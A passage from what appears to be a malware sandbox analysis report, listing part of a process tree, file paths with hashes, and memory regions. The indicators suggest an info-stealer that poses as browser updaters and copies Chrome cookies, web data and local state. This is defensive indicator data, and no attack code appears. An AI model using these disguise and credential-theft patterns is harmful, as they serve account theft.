                                                                                                                          • C:\Windows\System32\dllhost.exe
                                                                                                                            C:\Windows\System32\dllhost.exe /Processid:{26ba5712-5693-4c02-8cb4-6a5a6871cbaf}
                                                                                                                            1⤵
                                                                                                                              PID:3120
                                                                                                                            • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                                                                                                              1⤵
                                                                                                                                PID:312

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Program Files\Google\Chrome\updater.exe

                                                                                                                                Filesize

                                                                                                                                2.8MB

                                                                                                                                MD5

                                                                                                                                eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                                                                SHA1

                                                                                                                                c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                                                                SHA256

                                                                                                                                9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                                                                SHA512

                                                                                                                                ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies

                                                                                                                                Filesize

                                                                                                                                28KB

                                                                                                                                MD5

                                                                                                                                b472767fcc60e7474170f7f429dcb241

                                                                                                                                SHA1

                                                                                                                                6e8fcb2015f651198e69d766baac147c7554aadf

                                                                                                                                SHA256

                                                                                                                                f9ce515033256c1decc16a20a8cbc6c955640c122993a701863eace50db196b2

                                                                                                                                SHA512

                                                                                                                                340b57d99ac0f14df6257991394d9510201d2380d804d3f28d2f4ae04974410b95b1d83fab9cd0db7abb640e05a89369bd3804c3740f892423db453b6c493ff3

                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies

                                                                                                                                Filesize

                                                                                                                                28KB

                                                                                                                                MD5

                                                                                                                                87df1b8971e7651a1c5b0e67fbcdb260

                                                                                                                                SHA1

                                                                                                                                6b68f4d5c11a3b8c9f16b38c12d41fbbadd6e7ae

                                                                                                                                SHA256

                                                                                                                                d5026b3e35d9db926bda0c09f474d79d68ecedf4314ac5144cdcb4ef820acf39

                                                                                                                                SHA512

                                                                                                                                39ccbc5acc1ccff3f6586ae184ffc2cd219b36ce4a4a5fc732f72765d5c840d8789c77a52ba72e0b2a182b9b55bf36e7287242855f82a90a6cafd2f4d97c4c0f

                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                                                                                                                Filesize

                                                                                                                                88KB

                                                                                                                                MD5

                                                                                                                                9407c273d5ac2d1179b974cfbe9c538a

                                                                                                                                SHA1

                                                                                                                                9241ae89b901c0c15c3c4da464dfdb870271dc68

                                                                                                                                SHA256

                                                                                                                                9e56de569a22bda2249ab506454de362449b45106337d552d17d30822ce0ac8a

                                                                                                                                SHA512

                                                                                                                                eb2334219bca3debbf2f9859bb798c72c18279ed1a6c55aac9ad1e2af0cea800aada85aa27e8473da18ab922406c97dd8df30b2635cd4f1c81152cbb1057bdce

                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                105KB

                                                                                                                                MD5

                                                                                                                                aa5534dc2c65077151c8740e0a5afa60

                                                                                                                                SHA1

                                                                                                                                5cf8cb098fd1817616bfdfadde0b5e6e974dc84f

                                                                                                                                SHA256

                                                                                                                                b95908b6e8bf0bbff6ab8e95fc7a115ad5954a3d15f70494cce50ccc8982893d

                                                                                                                                SHA512

                                                                                                                                dbf0bf0b6f4c73b9518f328fb91976332ecd14a985e2516bd895925b7e26731685f573cccc67c0e26cd46247a9a5d73818c893490a4e18983a754cf91a6edd0b

                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                105KB

                                                                                                                                MD5

                                                                                                                                bb97beddbdb81aa8df9d8ea552d7e079

                                                                                                                                SHA1

                                                                                                                                432f321a93749af95107638bd9a454ffd38c91fe

                                                                                                                                SHA256

                                                                                                                                b6a73ab8d7fdf2884e2385f5ad8fe62b1c0624783ce7c50a07aa51d63cfed9d9

                                                                                                                                SHA512

                                                                                                                                9384184b8cecafc906fe1fc477fb0e5483336073f4815e316073684e0ddce8d86f328c0297f03ff83be2adae3ce2ce6bf7780a4e734dcaa60e4ab6e619f05bfd

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                SHA1

                                                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                SHA256

                                                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                SHA512

                                                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Saint stlr.exe.log

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                c89455577734b863a447e44a57dd60ea

                                                                                                                                SHA1

                                                                                                                                82530ad7e337b4c866beb8e9f1d0e2e0011ed8bc

                                                                                                                                SHA256

                                                                                                                                bfa39bf8f525794b4bd761834f5e475752a899f7d707932ec4561d656dcbdd70

                                                                                                                                SHA512

                                                                                                                                bdc2adacc8c447129bd5ad9d4e3cd965ad7e1fd1d7ed6d1e4d92159761c6e1e83a5b30226002dedbacfcd0ccca48d49a1be895c6b2ce73dadf0d89118be72de2

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                944B

                                                                                                                                MD5

                                                                                                                                6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                SHA1

                                                                                                                                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                SHA256

                                                                                                                                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                SHA512

                                                                                                                                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                1KB

                                                                                                                                MD5

                                                                                                                                44a4df334291b589b1c338423821860d

                                                                                                                                SHA1

                                                                                                                                4be606ea3b4f79efd86c3cc7d9d33cbc40f1b4d2

                                                                                                                                SHA256

                                                                                                                                c9690d7aa01f6e5884451170f4e791670d60798d5f4becae7fed5cc12f1d409e

                                                                                                                                SHA512

                                                                                                                                1cdf094d5946912090e87be8cb04ca2705af58ac527de8f61687788ef718062ee16d9f28bf4c7b4282ab5844027aba995a7604609e36190215f8df1adc343f7e

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                                                                                                                Filesize

                                                                                                                                2.8MB

                                                                                                                                MD5

                                                                                                                                9253ed091d81e076a3037e12af3dc871

                                                                                                                                SHA1

                                                                                                                                ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                                                                                                SHA256

                                                                                                                                78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                                                                                                                SHA512

                                                                                                                                29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                                                                                                                Filesize

                                                                                                                                2.8MB

                                                                                                                                MD5

                                                                                                                                9253ed091d81e076a3037e12af3dc871

                                                                                                                                SHA1

                                                                                                                                ec02829a25b3bf57ad061bbe54180d0c99c76981

                                                                                                                                SHA256

                                                                                                                                78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                                                                                                                SHA512

                                                                                                                                29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

                                                                                                                                Filesize

                                                                                                                                9KB

                                                                                                                                MD5

                                                                                                                                a169fb1a323c970f7a169b30657112cc

                                                                                                                                SHA1

                                                                                                                                5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                                                                                                SHA256

                                                                                                                                97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                                                                                                SHA512

                                                                                                                                8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

                                                                                                                                Filesize

                                                                                                                                9KB

                                                                                                                                MD5

                                                                                                                                a169fb1a323c970f7a169b30657112cc

                                                                                                                                SHA1

                                                                                                                                5347dc5c0fe604f8527e336dd09a522fef0af9db

                                                                                                                                SHA256

                                                                                                                                97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                                                                                                                SHA512

                                                                                                                                8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                                                                                                              • memory/620-207-0x00007FFF1ACB0000-0x00007FFF1ACC0000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/724-190-0x0000000003EC0000-0x00000000044E8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                6.2MB

                                                                                                                              • memory/724-198-0x0000000004D80000-0x0000000004D9E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                120KB

                                                                                                                              • memory/724-188-0x00000000014A0000-0x00000000014D6000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                216KB

                                                                                                                              • memory/724-193-0x00000000044F0000-0x0000000004512000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/724-194-0x00000000046C0000-0x0000000004726000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                408KB

                                                                                                                              • memory/920-196-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/920-199-0x00007FFF5AC30000-0x00007FFF5AE25000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/920-200-0x00007FFF590C0000-0x00007FFF5917E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/1892-153-0x0000000000F50000-0x0000000000F58000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/1892-156-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/1940-180-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/1940-177-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/3120-203-0x0000000140000000-0x0000000140042000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                264KB

                                                                                                                              • memory/3120-205-0x00007FFF5AC30000-0x00007FFF5AE25000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/3120-201-0x0000000140000000-0x0000000140042000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                264KB

                                                                                                                              • memory/3120-204-0x0000000140000000-0x0000000140042000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                264KB

                                                                                                                              • memory/3120-206-0x00007FFF590C0000-0x00007FFF5917E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/3436-138-0x0000000008A70000-0x0000000008B02000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                584KB

                                                                                                                              • memory/3436-139-0x00000000090C0000-0x0000000009664000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                5.6MB

                                                                                                                              • memory/3436-133-0x0000000000C60000-0x0000000000C88000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                160KB

                                                                                                                              • memory/3436-145-0x000000000A660000-0x000000000AB8C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                5.2MB

                                                                                                                              • memory/3436-140-0x0000000008B10000-0x0000000008B76000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                408KB

                                                                                                                              • memory/3436-136-0x0000000007B70000-0x0000000007B82000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/3436-134-0x00000000062D0000-0x00000000068E8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                6.1MB

                                                                                                                              • memory/3436-141-0x0000000008C80000-0x0000000008CF6000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                472KB

                                                                                                                              • memory/3436-144-0x0000000009F60000-0x000000000A122000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.8MB

                                                                                                                              • memory/3436-142-0x0000000008A20000-0x0000000008A70000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                320KB

                                                                                                                              • memory/3436-137-0x0000000007BD0000-0x0000000007C0C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                240KB

                                                                                                                              • memory/3436-135-0x0000000007C60000-0x0000000007D6A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/3772-159-0x0000017DB01B0000-0x0000017DB01D2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/3772-161-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/3772-163-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/4656-189-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/4656-195-0x00007FFF37650000-0x00007FFF38111000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB